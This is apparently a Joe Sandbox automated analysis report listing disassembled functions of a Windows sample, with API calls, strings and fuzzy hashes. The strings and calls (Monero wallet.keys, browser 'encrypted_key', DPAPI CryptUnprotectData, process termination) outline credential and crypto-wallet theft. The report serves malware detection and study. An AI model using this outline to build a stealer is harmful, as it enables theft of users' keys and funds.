                  Function 0092F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00941580,00940D92), ref: 0092F54C
                  • lstrlen.KERNEL32(00000000), ref: 0092F56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 63d32c0f42a330eb7a11269a74cdde7df768139344a3571458ec7e3461773692
                  • Instruction ID: cc4d18b1a4401d2bc4392ad01ab9a09634a3f3941a6720898c3896951b93860a
                  • Opcode Fuzzy Hash: 63d32c0f42a330eb7a11269a74cdde7df768139344a3571458ec7e3461773692
                  • Instruction Fuzzy Hash: BD51E171D10108AADB04FBB4DC96FED7379AFD4300F408528F956A7191EE346A09CFA6
                  Function 00933560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 6a223631c7ddec5bdf2a08e77482eb25e70f74245367340110d89fcdf450dc56
                  • Instruction ID: ad774aca065070f4f10c52fab33a0a8febead7339773644be7b03cd0e7606007
                  • Opcode Fuzzy Hash: 6a223631c7ddec5bdf2a08e77482eb25e70f74245367340110d89fcdf450dc56
                  • Instruction Fuzzy Hash: E041F1B5D10109AFCB04EFA4D896FFEB778AB94304F108418F51677291DB756A05CFA2
                  Function 00929CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00929D39
                    • Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
                    • Part of subcall function 00929AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
                    • Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
                    • Part of subcall function 00929AC0: LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F
                    • Part of subcall function 00929B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00929B84
                    • Part of subcall function 00929B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00929BA3
                    • Part of subcall function 00929B60: LocalFree.KERNEL32(?), ref: 00929BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 9839f718a494385f8a30ae95beeeb083b592baafc3ed53277c882f1cc9021c47
                  • Instruction ID: 1ba54bb8b4118f9f53a88aed5bc4dac95fd4696b9648d4d093c1adf5c572175c
                  • Opcode Fuzzy Hash: 9839f718a494385f8a30ae95beeeb083b592baafc3ed53277c882f1cc9021c47
                  • Instruction Fuzzy Hash: 6B313EB5D10219ABCF04DBE4EC85FEFB7B8AB88304F144518F905A7285EB709A44CBA1
                  Function 009394D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 009394EB
                    • Part of subcall function 00938D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0093951E,00000000), ref: 00938D5B
                    • Part of subcall function 00938D50: RtlAllocateHeap.NTDLL(00000000), ref: 00938D62
                    • Part of subcall function 00938D50: wsprintfW.USER32 ref: 00938D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009395AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009395C9
                  • CloseHandle.KERNEL32(00000000), ref: 009395D6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: 42bbeb6e91cff503ea4fdcf4464f768bf8b19adac6fa5e76798b8551acc8d892
                  • Instruction ID: ccc32bbc4b9e9e8d8f61ba7102e26948a964abd9d17f89f0fc3b26d1130737d9
                  • Opcode Fuzzy Hash: 42bbeb6e91cff503ea4fdcf4464f768bf8b19adac6fa5e76798b8551acc8d892
                  • Instruction Fuzzy Hash: 7131F971A00208AFDF14DBE0DD49BEDB7B8EB44700F104459F506AB184DBB8AA89CF52
                  Function 009392E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00933AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00933AEE,?), ref: 009392FC
                  • GetFileSizeEx.KERNEL32(000000FF,00933AEE), ref: 00939319
                  • CloseHandle.KERNEL32(000000FF), ref: 00939327
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: d18e3bb6ee8e6635699ae001d0c43cfa3c23643ff0ca2e5caad06c85806d02df
                  • Instruction ID: 0266ed6d40d7f5d0cd59c99ab57d876215968eaa51b73bc5b4091141954084db
                  • Opcode Fuzzy Hash: d18e3bb6ee8e6635699ae001d0c43cfa3c23643ff0ca2e5caad06c85806d02df
                  • Instruction Fuzzy Hash: 5FF03775E44208BBDF10DBB0DC59BAE77B9BB48720F108654FA51A72C0DAB8AA018F41
                  Function 0093C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 0093C74E
                    • Part of subcall function 0093BF9F: __amsg_exit.LIBCMT ref: 0093BFAF
                  • __getptd.LIBCMT ref: 0093C765
                  • __amsg_exit.LIBCMT ref: 0093C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0093C797
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: ac736d185d81e201477766f1e25ac46e6df123d46deddebe51f30e277fe607ef
                  • Instruction ID: b73a588170af642e0069e194238ee6129832b48ee7d210255137faa49392be1a
                  • Opcode Fuzzy Hash: ac736d185d81e201477766f1e25ac46e6df123d46deddebe51f30e277fe607ef
                  • Instruction Fuzzy Hash: 97F0BEB2908B009BD721BBB89807B5E33A0AF80724F204149FA0AB62D2CB645D419F56
                  Function 00934F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00934F7A
                  • lstrcat.KERNEL32(?,00941070), ref: 00934F97
                  • lstrcat.KERNEL32(?,01059040), ref: 00934FAB
                  • lstrcat.KERNEL32(?,00941074), ref: 00934FBD
                    • Part of subcall function 00934910: wsprintfA.USER32 ref: 0093492C
                    • Part of subcall function 00934910: FindFirstFileA.KERNEL32(?,?), ref: 00934943
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
                    • Part of subcall function 00934910: FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
                    • Part of subcall function 00934910: FindClose.KERNEL32(000000FF), ref: 00934B92
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: aebdd2a381829860b4f6835d0f6bb4f934ce2821ff6c980ce59ac4837c732991
                  • Instruction ID: 888f7a5870411a518f3ca092e3371e10031d9b6e6c694d89a8e9aff4da38b7c7
                  • Opcode Fuzzy Hash: aebdd2a381829860b4f6835d0f6bb4f934ce2821ff6c980ce59ac4837c732991
                  • Instruction Fuzzy Hash: 2D21477690020467CB54F760EC46FEE337DABD4700F004554F65AA71C5EEB5A6C98F92